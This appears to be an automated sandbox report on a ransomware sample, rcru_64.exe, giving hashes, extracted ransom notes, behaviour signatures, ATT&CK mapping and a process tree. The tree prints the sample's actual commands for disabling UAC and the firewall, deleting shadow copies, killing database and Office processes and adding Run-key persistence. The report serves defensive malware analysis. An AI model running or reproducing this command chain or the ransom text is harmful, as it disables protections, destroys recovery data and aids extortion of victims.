Analysis

  • max time kernel
    150s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    01-04-2021 09:52

General

  • Target

    rcru_64.exe

  • Size

    1.0MB

  • MD5

    0d5d7377432ee449f30626c2371a0080

  • SHA1

    56a1d1203d62c131b70837d75af79aa19a3b0487

  • SHA256

    94c8cf0e19aa11a48a57baf54cc3679dda1dac4ad59ece1bf86ef117a974ddf9

  • SHA512

    19980615dbcba8ca8151aa5b93bc614b79edd1d77abbe37293001ecf16991cc939afca1cf62cac90c05510174cb8b7521a3074fbc160b47fd53d374521e06f0a

Malware Config

Extracted

Path

\??\c:\Read_Me!_.txt

Ransom Note
Your Data Locked. To Get Decryption Instructions Email Us ,Don't Edit Files Or Folders ! ID : rfeHv0 Email Address :FilesRecoverEN@Gmail.com
Emails

FilesRecoverEN@Gmail.com

Extracted

Path

C:\Users\Admin\Desktop\ReadMe_Now!.hta

Ransom Note
All Your Files Have Been Encrypted ! All Your Files Encrypted Due To A Security Problem With Your PC. If You Need Your Files Please Send Us E-mail To Get Decryption Tools .The Only Way Of Recovering Files Is To Purchase For Decryption Tools ( Payment Must Be Made With Bitcoin ) . If You Do Not E-mail Us After 48 Hours Decryption Fee Will Double.Our E-mail Address : FilesRecoverEN@Gmail.comYour Personal ID : rfeHv0Sent E-mail Should Be Contains Your Personal ID.If Don't Get a Response Or Any Other Problem Write Us E-mail At : FilesRecoverEN@Protonmail.com Check Your Spam Folder Too. What Guarantee Do We Give You ? You Can Send Some Files For Decryption Test( Before Paying ). File Size Must Be Less Than 2MB And Files Should Not Contains Valuabe Data Like (Backups , Databases etc ... ) . Get Buy Bitcoin Instructions At LocalBitcoins : https://localbitcoins.com/guides/how-to-buy-bitcoins Buy Bitcoin Instructions At Coindesk And Other Websites By Searching At Google :http://www.coindesk.com/information/how-can-i-buy-bitcoins/ Attention !! Do Not Edit Or Rename Encrypted Files. Do Not Try To Decrypt Files By Third-Party Or Data Recovery Softwares It May Damage Files Forever. In Case Of Trying To Decrypt Files With Third-Party,Recovery Sofwares This May Make The Decryption Harder So Prices Will Be Rise.
Emails

FilesRecoverEN@Gmail.comYour

FilesRecoverEN@Protonmail.com

Signatures

  • UAC bypass 3 TTPs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies Windows Firewall 1 TTPs
  • Modifies extensions of user files 3 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Drops startup file 4 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 4 IoCs
  • Drops desktop.ini file(s) 19 IoCs
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 40 IoCs
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies registry key 1 TTPs 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\rcru_64.exe
    "C:\Users\Admin\AppData\Local\Temp\rcru_64.exe"
    1⤵
    • Modifies extensions of user files
    • Drops startup file
    • Drops desktop.ini file(s)
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Suspicious use of WriteProcessMemory
    PID:1152
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2032
      • C:\Windows\SysWOW64\reg.exe
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        3⤵
        • Modifies registry key
        PID:1976
      • C:\Windows\SysWOW64\vssadmin.exe
        vssadmin.exe Delete Shadows /All /Quiet
        3⤵
        • Interacts with shadow copies
        PID:1972
      • C:\Windows\SysWOW64\Wbem\WMIC.exe
        wmic shadowcopy delete
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1772
      • C:\Windows\SysWOW64\netsh.exe
        netsh advfirewall set currentprofile state off
        3⤵
        PID:1764
      • C:\Windows\SysWOW64\netsh.exe
        netsh firewall set opmode mode=disable
        3⤵
        PID:916
      • C:\Windows\SysWOW64\netsh.exe
        netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes
        3⤵
        PID:544
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c taskkill /im notepad.exe&taskkill /im msftesql.exe&taskkill /im sqlagent.exe&taskkill /im sqlbrowser.exe&taskkill /im sqlservr.exe&taskkill /im sqlwriter.exe&taskkill /im oracle.exe&taskkill /im ocssd.exe&taskkill /im dbsnmp.exe&taskkill /im synctime.exe&taskkill /im agntsvc.exe&taskkill /im mydesktopqos.exe&taskkill /im isqlplussvc.exe&taskkill /im xfssvccon.exe&taskkill /im mydesktopservice.exe&taskkill /im ocautoupds.exe&taskkill /im agntsvc.exe&taskkill /im encsvc.exe&taskkill /im firefoxconfig.exe&taskkill /im tbirdconfig.exe&taskkill /im ocomm.exe&taskkill /im mysqld.exe&taskkill /im mysqld-nt.exe&taskkill /im mysqld-opt.exe&taskkill /im dbeng50.exe&taskkill /im sqbcoreservice.exe&taskkill /im excel.exe&taskkill /im infopath.exe&taskkill /im msaccess.exe&taskkill /im mspub.exe&taskkill /im onenote.exe&taskkill /im outlook.exe&taskkill /im powerpnt.exe&taskkill /im steam.exe&taskkill /im thebat.exe&taskkill /im thebat64.exe&taskkill /im thunderbird.exe&taskkill /im visio.exe&taskkill /im winword.exe&taskkill /im wordpad.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1108
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im notepad.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1224
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im msftesql.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1984
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im sqlagent.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1784
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im sqlbrowser.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1584
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im sqlservr.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1352
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im sqlwriter.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:976
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im oracle.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1764
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im ocssd.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1812
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im dbsnmp.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:304
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im synctime.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1624
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im agntsvc.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2008
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im mydesktopqos.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1896
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im isqlplussvc.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1612
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im xfssvccon.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1456
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im mydesktopservice.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1056
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im ocautoupds.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:284
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im agntsvc.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:916
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im encsvc.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1188
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im firefoxconfig.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1996
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im tbirdconfig.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1776
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im ocomm.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1716
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im mysqld.exe
        3⤵
        • Kills process with taskkill
        PID:1616
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im mysqld-nt.exe
        3⤵
        • Kills process with taskkill
        PID:664
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im mysqld-opt.exe
        3⤵
        • Kills process with taskkill
        PID:804
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im dbeng50.exe
        3⤵
        • Kills process with taskkill
        PID:468
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im sqbcoreservice.exe
        3⤵
        • Kills process with taskkill
        PID:668
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im excel.exe
        3⤵
        • Kills process with taskkill
        PID:1196
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im infopath.exe
        3⤵
        • Kills process with taskkill
        PID:1224
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im msaccess.exe
        3⤵
        • Kills process with taskkill
        PID:1984
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im mspub.exe
        3⤵
        • Kills process with taskkill
        PID:1784
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im onenote.exe
        3⤵
        • Kills process with taskkill
        PID:1692
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im outlook.exe
        3⤵
        • Kills process with taskkill
        PID:1772
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im powerpnt.exe
        3⤵
        • Kills process with taskkill
        PID:1380
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im steam.exe
        3⤵
        • Kills process with taskkill
        PID:284
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im thebat.exe
        3⤵
        • Kills process with taskkill
        PID:916
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im thebat64.exe
        3⤵
        • Kills process with taskkill
        PID:556
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im thunderbird.exe
        3⤵
        • Kills process with taskkill
        PID:296
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im visio.exe
        3⤵
        • Kills process with taskkill
        PID:1304
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im winword.exe
        3⤵
        • Kills process with taskkill
        PID:1584
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im wordpad.exe
        3⤵
        • Kills process with taskkill
        PID:1456
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c echo %date%-%time%
      2⤵
      PID:1056
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ver
      2⤵
      PID:1352
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c nslookup myip.opendns.com. resolver1.opendns.com
      2⤵
      PID:612
      • C:\Windows\SysWOW64\nslookup.exe
        nslookup myip.opendns.com. resolver1.opendns.com
        3⤵
        PID:324
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f&reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f
      2⤵
      PID:1460
      • C:\Windows\SysWOW64\reg.exe
        reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f
        3⤵
        PID:1060
      • C:\Windows\SysWOW64\reg.exe
        reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f
        3⤵
        • Modifies registry key
        PID:1188
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Updaters /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f&reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f
      2⤵
      PID:1968
      • C:\Windows\SysWOW64\reg.exe
        reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Updaters /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f
        3⤵
        • Adds Run key to start application
        • Modifies registry key
        PID:896
      • C:\Windows\SysWOW64\reg.exe
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f
        3⤵
        • Adds Run key to start application
        PID:1104
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\ReadMe_Now!.hta"
      2⤵
      • Modifies Internet Explorer settings
      PID:1204
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\Documents and Settings\Admin\Desktop\ReadMe_Now!.hta"
      2⤵
      • Modifies Internet Explorer settings
      PID:1724
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:1316
  • C:\Windows\explorer.exe
    "C:\Windows\explorer.exe"
    1⤵
    PID:960
  • C:\Windows\system32\AUDIODG.EXE
    C:\Windows\system32\AUDIODG.EXE 0x1c0
    1⤵
    PID:1692
  • C:\Windows\system32\NOTEPAD.EXE
    "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Read_Me!_.txt
    1⤵
    PID:860

Network

MITRE ATT&CK Matrix ATT&CK v6

Persistence

  • Modify Existing Service (T1031): 1
  • Registry Run Keys / Startup Folder (T1060): 1

Privilege Escalation

  • Bypass User Account Control (T1088): 1

Defense Evasion

  • Bypass User Account Control (T1088): 1
  • Disabling Security Tools (T1089): 1
  • Modify Registry (T1112): 4
  • File Deletion (T1107): 2

Credential Access

  • Credentials in Files (T1081): 1

Discovery

  • Query Registry (T1012): 1
  • Peripheral Device Discovery (T1120): 1
  • System Information Discovery (T1082): 2

Collection

  • Data from Local System (T1005): 1

Impact

  • Inhibit System Recovery (T1490): 2

Downloads

  • C:\Users\Admin\Desktop\ReadMe_Now!.hta

    MD5

    0dc2284aa300da82f73edf834dfa17fc

    SHA1

    36b14457648c4c97f000e818923559498928d902

    SHA256

    ab7fc0f5cba98f39241b4d3bca54589e00bfb7ce0babe487cdb425c026fc858d

    SHA512

    543041a7f19cd1fc599029a391b69b783e3f7a1e7ef9b8dbbfa00dbdf16cbae5abafd2d2a3de8a54a5bba20cb827a7ef8d611d39c5a8125e4ce758951572ff97

  • C:\Users\Admin\Desktop\Read_Me!_.txt

    MD5

    a31ed461bf648a1f44b8419efbfce439

    SHA1

    fde48ca8312505b27492c0f7628acd9e9155deae

    SHA256

    2ea814273b2d74bc4aabf8aa0b975b3c92177e7ea417f7a62e18dc41b969cc95

    SHA512

    fb8e4f57f9823daa52b1abceda86f59fb66ecdf808420a3416f8e8c6a7f98ef27036bc01b9a73725dc17cbc24513a32f215512df372a1e513077e23b827daec6
